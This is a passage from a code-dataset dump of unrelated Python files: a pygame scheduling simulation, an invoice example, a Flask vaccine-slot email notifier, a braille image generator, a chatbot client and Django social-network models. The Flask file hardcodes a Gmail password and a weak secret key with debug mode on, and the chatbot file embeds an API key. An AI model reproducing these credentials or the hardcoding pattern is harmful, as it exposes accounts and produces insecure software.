y):\n\t\t\t\t\t\t\t\tself.cola3.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador3.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra3.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click der\")\n\n\tdef pintar(self):\n\t\twhile self.procesador1.uso or self.procesador2.uso or self.procesador3.uso:\n\t\t\tself.reloj.tick(3)\n\n\t\t\tfor elemento in self.listaChefs:\n\t\t\t\telemento.update()\n\n\t\t\ttime.sleep(0.5)\n\t\t\tscreen.blit(self.fondo, self.fondorect)\n\n\t\t\tfor elemento in self.listaChefs:\n\t\t\t\tscreen.blit(elemento.image, elemento.rect)\n\n\t\t\tfor elemento in self.listaPizarras:\n\t\t\t\tscreen.blit(elemento.image, elemento.rect)\n\t\t\t\tfor i in elemento.arregloRecetas:\n\t\t\t\t\tif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==0:\n\t\t\t\t\t\tscreen.blit(i.iml, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==1:\n\t\t\t\t\t\tscreen.blit(i.imb, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==2:\n\t\t\t\t\t\tscreen.blit(i.ims, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==3:\n\t\t\t\t\t\tscreen.blit(i.ime, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==4:\n\t\t\t\t\t\telemento.arregloRecetas.remove(i)\n\n\t\t\tfor elemento in self.listaRecetas:\n\t\t\t\tscreen.blit(elemento.image, elemento.rect)\n\n\t\t\tfor elemento in self.listaComida:\n\t\t\t\tscreen.blit(elemento.iml, elemento.rect)\n\n\t\t\tscreen.blit(self.cuchillos.image, self.cuchillos.rect)\n\t\t\tscreen.blit(self.licuadora.image, self.licuadora.rect)\n\t\t\tscreen.blit(self.horno.image, self.horno.rect)\n\n\t\t\tpygame.display.update()\n\n\tdef crearProceso(self,nProcesos):\n\t\tfor i in range(nProcesos):\n\t\t\tself.asignar_pedido_aleatorio()\n\n\tdef asignar_pedido_aleatorio(self):\n\t\taleatorio1=np.random.randint(3)\n\t\taleatorio2=np.random.randint(3)\n\t\tif aleatorio1==0:\n\t\t\tproceso=PolloConPapas(self.numPo,self.recursos[0],size)\n\t\t\tself.numPo+=1\n\t\t\testado=\"trabajandoHorno1\"\n\n\t\telif aleatorio1==1:\n\t\t\tproceso=Ensalada(self.numEn,self.recursos[1],size)\n\t\t\tself.numEn+=1\n\t\t\testado=\"trabajandoCuchillo1\"\n\t\telse:\n\t\t\tproceso= Malteada(self.numMa,self.recursos[2],size)\n\t\t\tself.numMa+=1\n\t\t\testado=\"trabajandoLicuadora1\"\n\n\t\tif aleatorio2==0:\n\t\t\tself.cola1.put(proceso)\n\t\t\tself.procesador1.estado=estado\n\t\telif aleatorio2==1:\n\t\t\tself.cola2.put(proceso)\n\t\t\tself.procesador2.estado=estado\n\t\telse:\n\t\t\tself.cola3.put(proceso)\n\t\t\tself.procesador3.estado=estado\n\nclass Chef(Sprite, Procesador):\n\tdef __init__(self, cont_size,idProcesador,*args):\n\t\tSprite.__init__(self)\n\t\tProcesador.__init__(self,idProcesador,*args)\n\t\tself.cont_size = cont_size\n\t\tself.estados = [\"espera\", \"trabajandoCuchillo1\", \"trabajandoCuchillo2\",\n\t\t\t\t\t\t\"trabajandoHorno1\", \"trabajandoHorno2\",\n\t\t\t\t\t\t\"trabajandoLicuadora1\", \"trabajandoLicuadora2\"]\n\t\tself.estado = self.estados[0]\n\t\tself.imagenes = 
[util.cargar_imagen('imagenes/chef.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefCuchi.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefCuchi2.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefHorno.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefHorno2.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefLicu.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefLicu2.png')]\n\t\tself.image = self.imagenes[0]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.move_ip(cont_size[0], cont_size[1]-250)\n\n\tdef update(self):\n\t\t#animacion sprite\n\t\tif self.proceso==None:\n\t\t\tself.image = self.imagenes[0]\n\t\t\tprint(\"el procesador\",self,\"no tiene proceso\")\n\t\telse:\n\t\t\tif self.proceso.recurso.nombre==\"Cuchillos\":\n\t\t\t\tif self.estado == self.estados[1]:\n\t\t\t\t\tself.image = self.imagenes[1]\n\t\t\t\t\tself.estado = self.estados[2]\n\t\t\t\telse:\n\t\t\t\t\tself.image = self.imagenes[2]\n\t\t\t\t\tself.estado = self.estados[1]\n\t\t\telif self.proceso.recurso.nombre==\"Horno\":\n\t\t\t\tif self.estado == self.estados[3]:\n\t\t\t\t\tself.image = self.imagenes[3]\n\t\t\t\t\tself.estado = self.estados[4]\n\t\t\t\telse:\n\t\t\t\t\tself.image = self.imagenes[4]\n\t\t\t\t\tself.estado = self.estados[3]\n\t\t\telse:\n\t\t\t\tif self.estado == self.estados[5]:\n\t\t\t\t\tself.image = self.imagenes[5]\n\t\t\t\t\tself.estado = self.estados[6]\n\t\t\t\telse:\n\t\t\t\t\tself.image = self.imagenes[6]\n\t\t\t\t\tself.estado = self.estados[5]\n\ncliente = cliente()\ncliente.iniciar()\n","sub_path":"Chef Race (SRTF) Final/srtf.py","file_name":"srtf.py","file_ext":"py","file_size_in_byte":13609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"91306060","text":"from datetime import date\nfrom typing import List\n\n\nclass Item:\n def __init__(self, descricao: str, valor: float):\n self._descricao: str = descricao\n self._valor: float = valor\n\n @property\n def descricao(self) -> str:\n return self._descricao\n\n @property\n def valor(self) -> float:\n return self._valor\n\n\nclass NotaFiscal:\n def __init__(self, razao_social: str,\n cnpj: str,\n itens: List[Item],\n data_da_emissao: date = date.today(), detalhes: str = '', observadores: List[any] = None):\n self._razao_social: str = razao_social\n self._cnpj: str = cnpj\n self._data_emissao: date = data_da_emissao\n if len(detalhes) > 20:\n raise Exception('Detalhes da nota não pode ter mais do que 20 caracteres')\n self._detalhes: str = detalhes\n self._itens: List[Item] = itens\n\n if observadores:\n for observador in observadores:\n observador(self)\n\n @property\n def razao_social(self) -> str:\n return self._razao_social\n\n @property\n def cnpj(self) -> str:\n return self._cnpj\n\n @property\n def data_emissao(self) -> date:\n return self._data_emissao\n\n @property\n def detalhes(self) -> str:\n return self._detalhes\n\n\nif __name__ == '__main__':\n from observadores import (\n imprime,\n envia_email,\n salva_no_banco\n )\n\n itens_teste: List[Item] = [\n Item(\n 'ITEM A',\n 100\n ),\n Item(\n 'ITEM B',\n 200\n )\n ]\n\n nota_fiscal: NotaFiscal = NotaFiscal(\n razao_social='FHSA Limitada',\n cnpj='012345678901234',\n itens=itens_teste,\n observadores=[imprime, envia_email, salva_no_banco]\n )\n","sub_path":"parte_um/nota_fiscal.py","file_name":"nota_fiscal.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"357068136","text":"from flask import Flask,render_template,request,session,redirect,url_for\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import (StringField,SelectField,SubmitField,IntegerField)\r\nfrom wtforms import TextField\r\nfrom wtforms import validators\r\nfrom wtforms.validators import DataRequired,Email\r\nimport sqlite3 as sql\r\nimport os\r\nfrom datetime import datetime\r\nimport requests\r\nfrom flask_mail import Mail, Message\r\n\r\ncurrentdirectory = os.path.dirname(os.path.abspath(__file__))\r\n#__file__ -> app.py\r\n#os.path.abspath(__file__) -> grabing absolute path for app.py\r\n#o.apth.dirname ->grab directory name\r\n#o/p look like C:\\users\\deeksha\\pycharmProject\\cvt\\app.py\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = 'mysecretkey'\r\n\r\n#configuring flask-mail\r\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\r\napp.config['MAIL_PORT'] = 465\r\napp.config['MAIL_USERNAME'] = 'dpbp2022@gmail.com'\r\napp.config['MAIL_PASSWORD'] = 'Dpbpnie@2022'\r\napp.config['MAIL_USE_TLS'] = False\r\napp.config['MAIL_USE_SSL'] = True\r\nmail = Mail(app)\r\n\r\n\r\nclass InfoForm(FlaskForm):\r\n name = StringField('Name', [DataRequired()])\r\n email = TextField('Email',[validators.DataRequired(\"Please enter your email address\"),validators.Email(\"Please enter your valid email address\")])\r\n district = SelectField(u'District:',\r\n choices = [('270', 'Bagalkot'), ('276', 'Bangalore Rural'),('265','Banglaore Urban'),('294','BBMP'),\r\n ('264','Belgaum'),('274','Bellary'),('272','Bidar'),('271','Chamarajanagar'),('273','Chikamagalur'),\r\n ('291','Chikkaballapur'),('268','Chitradurga'),('269','Dakshina Kannada'),('275','Davanagere'),\r\n ('278','Dharwad'),('280','Gadag'),('267','Gulbarga'),('289','Hassan'),('279','Haveri'),\r\n ('283','Kodagu'),('277','Kolar'),('282','Koppal'),('290','Mandya'),('266','Mysore'),\r\n ('284','Raichur'),('292','Ramanagara'),('287','Shimoga'),('288','Tumkur'),('286','Udupi'),\r\n ('281','Uttar Kannada'),('293','Vijayapura'),('285','Yadgir')])\r\n submit = SubmitField('Submit')\r\n age = IntegerField('Age', [DataRequired()])\r\n\r\n@app.route('/',methods = ['GET','POST'])\r\ndef index():\r\n form = InfoForm()\r\n error=None\r\n if form.validate_on_submit():\r\n session['name'] = form.name.data\r\n session['email'] = form.email.data\r\n session['dist'] = form.district.data\r\n session['age'] = form.age.data\r\n d = { 270:'Bagalkot',276:'Bangalore_Rural',265:'Banglaore Urban',294:'BBMP',264:'Belgaum',\r\n 274:'Bellary',272: 'Bidar',271:'Chamarajanagar',273:'Chikamagalur',\r\n 291:'Chikkaballapur',268:'Chitradurga',269:'Dakshina Kannada',275:'Davanagere',\r\n 278:'Dharwad',280:'Gadag',267:'Gulbarga',289:'Hassan',279:'Haveri',\r\n 283:'Kodagu',277:'Kolar',282:'Koppal',290:'Mandya',266:'Mysore',\r\n 284:'Raichur',292:'Ramanagara',287:'Shimoga',288:'Tumkur',286:'Udupi',\r\n 281:'Uttar Kannada',293:'Vijayapura',285:'Yadgir'}\r\n name = session['name']\r\n email = session['email']\r\n di = session['dist']\r\n m = d[int(di)]\r\n age = session['age']\r\n #district = request.args.get('district')\r\n try:\r\n with sql.connect(currentdirectory + \"\\coviddatabase.db\") as con:\r\n cur=con.cursor()\r\n #cur.execute(\"CREATE TABLE stud(name TEXT,addr TEXT,city TEXT,pin TEXT)\")\r\n cur.execute(\"INSERT INTO Users(name,email,district,district_id,age) VALUES(?,?,?,?,?)\",(name,email,m,di,age))\r\n con.commit()\r\n receiver = email\r\n msg = Message('Vaccine Notifier', sender='dpbp2022@gmail.com', recipients=[receiver])\r\n msg.body = 
'Thank you for registering to our website we will notify the vaccination slots' \\\r\n 'near you soon as and when it is available'\r\n mail.send(msg)\r\n return redirect(url_for(\"thankyou\"))\r\n except sql.Error as e:\r\n if con:\r\n con.rollback()\r\n print(f\"Error {e.args[0]}\")\r\n error=\"Email Id already exists,Please try with different email id\"\r\n return render_template(\"index.html\", form=form, error=error)\r\n\r\n return render_template(\"index.html\",form=form)\r\n\r\n\r\n@app.route('/thankyou')\r\ndef thankyou():\r\n name = request.args.get('name')\r\n district = request.args.get('district')\r\n return render_template('thank_you.html', name=name,district=district )\r\n\r\n@app.route('/list')\r\ndef list():\r\n con = sql.connect(\"coviddatabase.db\")\r\n con.row_factory = sql.Row\r\n cur = con.cursor()\r\n cur.execute(\"SELECT * FROM Users\")\r\n rows = cur.fetchall()\r\n for row in rows:\r\n print(row[0],row[1],row[2],row[3],row[4])\r\n name = row[0]\r\n email = row[1]\r\n district = row[2]\r\n district_id = row[3]\r\n age = row[4]\r\n start_date = datetime.today().strftime(\"%d-%m-%Y\")\r\n url = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict\"\r\n params = {\"district_id\": district_id, \"date\": start_date}\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\"}\r\n result = requests.get(url, params=params, headers=headers)\r\n s = \"Dear {} \".format(name)\r\n s = s + \"As requested by you, notifying you of some new vaccine slots centers around {} \".format(district)\r\n s = s + \"that have available slots on CoWIN.Here is the list\\n\\n\"\r\n flag=0\r\n if result.ok:\r\n response_json = result.json()\r\n if response_json[\"centers\"]:\r\n flag = 1\r\n for center in response_json[\"centers\"]:\r\n for session in center[\"sessions\"]:\r\n if age >= 45:\r\n if (session[\"min_age_limit\"] == 45 and session[\"available_capacity\"] > 0):\r\n s = s + 'Pincode: {}\\n'.format(center[\"pincode\"])\r\n s = s + \"Available on: {}\\n\".format(start_date)\r\n s = s + \"\\tHospital: {}\\n\".format(center[\"name\"])\r\n s = s + \"\\tAddress: {}\\n\".format(center[\"address\"])\r\n s = s + \"\\tBlock_name: {}\\n\".format(center[\"block_name\"])\r\n s = s + \"\\tPrice: {}\\n\".format(center[\"fee_type\"])\r\n s = s + \"\\tDose1 Capacity : {}\\n\".format(session[\"available_capacity_dose1\"])\r\n s = s + \"\\tDose2 Capacity : {}\\n\".format(session[\"available_capacity_dose2\"])\r\n if (session[\"vaccine\"] != ''):\r\n s = s + \"\\tVaccine type: {}\\n\\n\".format(session[\"vaccine\"])\r\n\r\n elif age >= 18:\r\n if (session[\"min_age_limit\"] == 18 and session[\"available_capacity\"] > 0):\r\n s = s + 'Pincode: {}\\n'.format(center[\"pincode\"])\r\n s = s + \"Available on: {}\\n\".format(start_date)\r\n s = s + \"\\tHospital: {}\\n\".format(center[\"name\"])\r\n s = s + \"\\tAddress: {}\\n\".format(center[\"address\"])\r\n s = s + \"\\tBlock_name: {}\\n\".format(center[\"block_name\"])\r\n s = s + \"\\tPrice: {}\\n\".format(center[\"fee_type\"])\r\n s = s + \"\\tDose1 Capacity : {}\\n\".format(session[\"available_capacity_dose1\"])\r\n s = s + \"\\tDose2 Capacity : {}\\n\".format(session[\"available_capacity_dose2\"])\r\n if (session[\"vaccine\"] != ''):\r\n s = s + \"\\tVaccine type: {}\\n\\n\".format(session[\"vaccine\"])\r\n s = s + \"\\n\\nBook your slots at the official CoWIN portal:https://selfregistration.cowin.gov.in/\"\r\n # print(s)\r\n if flag == 1:\r\n receiver = email\r\n msg = 
Message('Vaccine Notifier', sender='dpbp2022@gmail.com', recipients=[receiver])\r\n msg.body = s\r\n mail.send(msg)\r\n return render_template(\"notify.html\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"576129191","text":"#生成数据图像\nimport os\nimport math\nimport random\nimport numpy as np\nfrom PIL import Image\nimport cv2 as cv\nfrom tqdm import trange\t# 替换range()可实现动态进度条,可忽略\nfrom matplotlib import pyplot as plt\nfrom NeuralNetwork import tools\nimport pylab\n\nPATH = \"F:/BrailleFilePath/Dataset\";\n\n#生成空图像\ndef bulidModel(height, width):\n img = np.zeros((height, width), np.uint8); #生成二值图像\n return img;\n\n#把表示盲文的字符串变换为3*2的矩阵\ndef getBrailleArray(char_string):\n arr = np.zeros((3, 2), np.uint8);\n for i in range(3): #\n arr[i][0] = int(char_string[i]);\n for i in range(3): #\n arr[i][1] = int(char_string[i+3]);\n return arr;\n\n#绘制盲文\ndef drawBraille(char_string, height, width, size, height_b, width_b):\n # 对字符串反转,这样更便于我们对盲文系统的理解和使用\n # l = list(char_string);\n # l.reverse();\n # char_string = \"\".join(l);\n\n arr = getBrailleArray(char_string); #生成矩阵\n #print(arr);\n img = bulidModel(height, width); #生成背景\n h = round(height/3);\n w = round(width/2);\n # print(\"size:\",height,width);\n #把图像分为3*2=6个方格,在其中心绘制盲符\n for i in range(3):\n for j in range(2):\n if arr[i][j]==1 :\n # 中心坐标\n y = round(h / 2 + i * height / 3 + height_b + (1 - i) * size / 3);\n x = round(w / 2 + j * width / 2 + width_b + (0.5 - j) * 2 * size / 3); # 最后的数表示点距离的紧密度,数值越大越紧密\n # print(x, y);\n cv.circle(img, (x, y), size, 255, -1, 8);\n return img;\n\n#添加噪声\ndef setNoisy(img, num, sert):\n (h,w) = img.shape;\n for i in range(num):\n x = random.randint(1, h-1);\n y = w-random.randint(1, w-1);\n img[x][y] = sert;\n\n return img;\n\ndef rotate(img, rotate): #图像旋转\n img = Image.fromarray(img.astype('uint8'));\n img = img.rotate(rotate);\n img = np.asarray(img);\n return img\n\n#随机的仿射变换形变\ndef deform(img):\n (h,w) = img.shape;\n for i in range(1):\n src = np.float32([[0, 0], [100, 0], [0, 100]]);\n dst = np.float32([[0+random.randint(-5,5), 0+random.randint(-5,5)], [100+random.randint(-5,5), 0+random.randint(-5,5)], [0+random.randint(-5,5), 100+random.randint(-5,5)]]);\n A1 = cv.getAffineTransform(src, dst)\n # 第三个参数:变换后的图像大小\n # 第四个参数:形变后的边界值,默认0\n img = cv.warpAffine(img, A1, (w, h), borderValue = 0)\n # 显示操作之后的图片\n return img;\n\n#构建盲文二值图像\ndef build(char_bin, height, width, size):\n img = drawBraille(char_bin, height, width, size,\n random.randint(-round(height/25), round(height/25)),\n random.randint(-round(width / 15), round(width / 15))\n );\n img = rotate(img, random.randint(-2, 2)); # 随机旋转\n img = deform(img);\n # img = setNoisy(img,1000, 255);\n # img = setNoisy(img, 1000, 0);\n return img;\n\ndef main():\n height = 350;\n width = 250;\n size = 35;\n dataset_num = 1000;\n #64种点字\n print('Building images of braille characters');\n for c in trange(64):\n #创建目录\n trainPath = PATH + \"/training-images/\"+str(c);\n testPath = PATH+\"/test-images/\"+str(c);\n\n char_bin = tools.binString(c);\n if ~os.path.exists(trainPath):\n os.makedirs(trainPath);\n if ~os.path.exists(testPath):\n os.makedirs(testPath);\n\n #把标签保存到文件 a为追加写入 r为只读 w为覆盖写入\n f = open(PATH+\"/batches.meta.txt\", \"a\");\n f.write(char_bin+\"\\n\");\n\n #每种点字生成n个图像,80%作为训练集,20%作为测试集\n s1 = round(dataset_num * 0.8);\n s2 = round(dataset_num * 0.2);\n for i in range(s1):\n img = build(char_bin, height, width, size+random.randint(-5,5));\n # tools.showImg(\"Image\", img);\n img = Image.fromarray(img.astype('float32')); #转为Image类型\n img = img.resize((28, 28), Image.ANTIALIAS); #重整尺寸,不改变长宽比例\n img = np.asarray(img); #转为矩阵类型(个人比较喜欢矩阵操作)\n\n filename = trainPath + \"/im\" + str(i) + \".png\";\n cv.imwrite(filename, img); # 保存图像\n for i in 
range(s2):\n img = build(char_bin, height, width, size+random.randint(-10,10));\n # tools.showImg(\"Image\", img);\n img = Image.fromarray(img.astype('float32')); #转为Image类型\n img = img.resize((28, 28), Image.ANTIALIAS); #重整尺寸,不改变长宽比例\n img = np.asarray(img); #转为矩阵类型(个人比较喜欢矩阵操作)\n\n filename = testPath + \"/im\" + str(s1+i) + \".png\";\n cv.imwrite(filename, img); # 保存图像\n\n print('\\nAll finished!');\n\n\nif __name__ == \"__main__\":\n #initdirs();\n\n main();\n\n\n # img = build(tools.binString(63), 350, 250, 40);\n # img = Image.fromarray(img.astype('float32')); # 转为Image类型\n # img = img.resize((28, 28), Image.ANTIALIAS); # 重整尺寸,不改变长宽比例\n # img = np.asarray(img); # 转为矩阵类型(个人比较喜欢矩阵操作)\n # tools.showImg(\"Image\", img);\n\n","sub_path":"Dataset/Dataset_images.py","file_name":"Dataset_images.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"470119958","text":"import pygame, sys\npygame.init()\n\nscreen = pygame.display.set_mode((640,480))\npygame.display.set_caption(\"TEST\")\n\nbg = pygame.Surface(screen.get_size()).convert()\nbg.fill((0,255,0))\nblock = pygame.Surface((100,100)).convert() \nblock.fill((255,0,0))\nblockx=0 \n \nclock = pygame.time.Clock()\n\nwhile 1:\n clock.tick(30)\n \n blockx+=20\n if blockx>640:\n blockx=-100\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n break\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n sys.exit()\n break\n \n screen.blit(bg, (0,0))\n screen.blit(block, (blockx,190))\n pygame.display.flip()\n","sub_path":"Experimental/randompygametest.pyw","file_name":"randompygametest.pyw","file_ext":"pyw","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"405809348","text":"#8.8\n\ndef make_ablum(art_name='alif',art_album='bastobota'):\n art_info ={}\n take_info = 3\n while take_info>0:\n art_name = input('enter name:')\n if art_name in ('q','Q','QUIT','quit'):\n break\n art_album =input('enter album name: ')\n if art_album in ('q','Q','QUIT','quit'):\n break\n while art_album in art_info.values():\n print(\"you can't enter others album.\\nplease enter your album name.\")\n art_name = input('enter name:')\n art_album = input('enter album name: ')\n while art_album not in art_info.values():\n break\n continue\n else:\n art_info[art_name] =art_album\n take_info-=1\n for art_name in art_info.keys():\n print(f\"\\nhi {art_name},\\n\\tyour album is {art_info[art_name]}\")\n\nmake_ablum()","sub_path":"chapter_08/example_81.py","file_name":"example_81.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"586172621","text":"import requests\nimport json\napiKey = '41ec20e16de74df9b36e7b51af3ff712'\nuserId = 'raspberry'\nurl = 'http://openapi.tuling123.com/openapi/api/v2'\n\ndef tuling_chat(text):\n\n perception = {\n 'inputText':{\n 'text':text\n }\n }\n\n userInfo = {\n 'apiKey':apiKey,\n 'userId':userId\n }\n\n data = {\n 'reqType':0,\n 'perception':perception,\n 'userInfo':userInfo\n }\n\n headers = {\n 'Content-Type':'application/json'\n }\n\n data_json = json.dumps(data).encode('utf-8')\n result = requests.post(url, data=data_json, headers=headers)\n response_dict = json.loads(result.text)\n response_text = response_dict['results'][0]['values']['text']\n print(response_text)\n\nif __name__ == \"__main__\":\n text = input(\"请输入:\")\n tuling_chat(text)\n","sub_path":"各个模块的demo/图灵机器人/tuling.py","file_name":"tuling.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"72903186","text":"# aaa\n# python3\n\n# Python Programming: An Introduction to Computer Science\n# Chapter 7\n# Programming Excercise 9\n\n\ndef easterDate(year):\n if year < 1982 or year > 2048:\n return \"Year entered is out of date range.\"\n else:\n a = year % 19\n b = year % 4\n c = year % 7\n d = (19 * a + 24) % 30\n e = (2 * b + 4 * c + 6 * d + 5) % 7\n if 22 + d + e <= 31:\n date = \"Easter falls on March \" + str((22 + d + e))\n else:\n date = \"Easter falls on April \" + str((22 + d + e - 31))\n return date\n\n\ndef main():\n y = int(input(\"Enter the year: \"))\n print(easterDate(y))\n\n\nmain()\n","sub_path":"PPCh7PE9.py","file_name":"PPCh7PE9.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"535344166","text":"import pygame\nclass Bala(pygame.sprite.Sprite):\n def __init__(self, archivo):\n pygame.sprite.Sprite.__init__(self)\n self.image=pygame.image.load(archivo).convert_alpha()\n self.rect=self.image.get_rect()\n self.rect.x=0\n self.rect.y=0\n self.var_x=10\n self.dir=0\n\n def update(self):\n if self.dir==1:\n self.var_x=-20\n self.rect.x+=self.var_x\n","sub_path":"Bala_enemigo.py","file_name":"Bala_enemigo.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444702391","text":"################################################################################\r\n##Problem 8 Chef and Operators ##\r\n##Description Chef has just started Programming, he is in first year of ##\r\n## Engineering. Chef is reading about Relational Operators. ##\r\n## ##\r\n## Relational Operators are operators which check relatioship ##\r\n## between two values. Given two numerical values A and B you need ##\r\n## to help chef in finding the relationship between them that is, ##\r\n## ##\r\n## * First one is greater than second or, ##\r\n## * First one is less than second or, ##\r\n## * First and second one are equal. ##\r\n##Input First line contains an integer T, which denotes the number of ##\r\n## testcases. Each of the T lines contain two integers A and B. ##\r\n##Output For each line of input produce one line of output. This line ##\r\n## contains any one of the relational operators '≺' , '≻' , '='. ##\r\n##Note The problem can be found on CodeChef at: ##\r\n## https://www.codechef.com/problems/CHOPRT ##\r\n################################################################################\r\n\r\n########################\r\n##Version 1 ##\r\n##Author Nam Phung ##\r\n##Date Dec 21 2015 ##\r\n########################\r\n\r\n##Input total test cases\r\nt = int(raw_input());\r\n\r\n##Input & process numbers\r\nfor i in range (t):\r\n \r\n [a,b] = raw_input().split()\r\n a = int(a)\r\n b = int(b)\r\n\r\n if (a < b): print('<')\r\n elif (a == b): print('=')\r\n else: print('>')\r\n","sub_path":"Python/08 - Chef And Operators.py","file_name":"08 - Chef And Operators.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"351426555","text":"from django.db.models.signals import post_save, pre_save\nfrom django.contrib.auth.models import User\nfrom django.dispatch import receiver\nfrom django.db import models\n\n# Create your models here.\n\nclass Country(models.Model):\n name = models.CharField(max_length = 50, primary_key = True)\n\n def __str__(self):\n return self.name\n\nclass City(models.Model):\n country = models.ForeignKey(Country, on_delete = models.CASCADE)\n name = models.CharField(max_length = 50)\n\n def __str__(self):\n return self.name\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete = models.CASCADE, primary_key = True)\n\n phonenumber = models.IntegerField(null = True, blank = True)\n birthdate = models.DateField()\n\n movies = models.ManyToManyField('Movie', blank = True)\n books = models.ManyToManyField('Book', blank = True)\n\n city = models.ForeignKey(City, on_delete = models.SET_NULL, null = True)\n \n image = models.ImageField(default = 'profile/default.png', upload_to = 'profile/')\n \n friend_requests = models.ManyToManyField('self', 'friend_requests', blank = True)\n friends = models.ManyToManyField('self', 'friends', blank = True)\n\n def accept_request(self, of):\n if of in self.friend_requests.all() and of not in self.friends.all() and self not in of.friends.all():\n self.friend_requests.remove(of)\n self.friends.add(of)\n of.friends.add(self)\n return True\n return False\n\n def cancel_request(self, fr):\n if self in fr.friend_requests.all() and fr not in self.friends.all() and self not in fr.friends.all():\n fr.friend_requests.remove(self)\n return True\n return False\n\n def notify(self, by):\n Notification.objects.create(from_profile = by, to_profile = self)\n\n def notified(self, by):\n nots = Notification.objects.filter(from_profile = by, to_profile = self)\n notified = nots.count() > 0\n nots.delete()\n return notified\n\n def remove_friend(self, friend):\n if friend in self.friends.all() and self in friend.friends.all():\n self.friends.remove(friend)\n friend.friends.remove(self)\n return True\n return False\n\n def remove_request(self, by):\n if by in self.friend_requests.all() and by not in self.friends.all() and self not in by.friends.all():\n self.friend_requests.remove(by)\n return True\n return False\n\n def send_request(self, to):\n if to not in self.friend_requests.all() and to not in self.friends.all() and self not in to.friends.all():\n to.friend_requests.add(self)\n return True\n return False\n\n def __str__(self):\n return self.user.username\n\nclass Notification(models.Model):\n from_profile = models.ForeignKey(Profile, on_delete = models.CASCADE, related_name = 'from_profile')\n to_profile = models.ForeignKey(Profile, on_delete = models.CASCADE, related_name = 'to_profile')\n\nclass Chat(models.Model):\n receiver = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'receiver')\n sender = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'sender')\n datetime = models.DateTimeField()\n content = models.TextField()\n\n def __str__(self):\n return '{} - {} - {}'.format(self.sender.username, self.receiver.username, self.datetime.timestamp())\n\nclass Publication(models.Model):\n author = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'author')\n picture = models.ImageField(blank = True, upload_to = 'posts')\n datetime = models.DateTimeField()\n text = models.TextField()\n\n def __str__(self):\n return self.user.username + ' - ' + self.text\n\n @property\n def 
comments(self):\n return Comment.objects.filter(publication_id = self.id)\n\n @property\n def likes(self):\n return PublicationLike.objects.filter(publication = self)\n\nclass Comment(models.Model):\n publication = models.ForeignKey(Publication, on_delete = models.CASCADE, related_name = 'comment_publication')\n user = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'comment_user')\n text = models.TextField()\n\n def __str__(self):\n return self.user.username + ' - ' + self.text\n\nclass PublicationLike(models.Model):\n publication = models.ForeignKey(Publication, on_delete = models.CASCADE, related_name = 'publication')\n user = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'user')\n\nclass Movie(models.Model):\n title = models.TextField(primary_key = True)\n\n def __str__(self):\n return self.title\n\nclass Book(models.Model):\n title = models.TextField(primary_key = True)\n\n def __str__(self):\n return self.title\n\n@receiver(post_save, sender = User)\ndef save_user_profile(sender, instance, **kwargs):\n if Profile.objects.filter(user = instance).count() > 0:\n 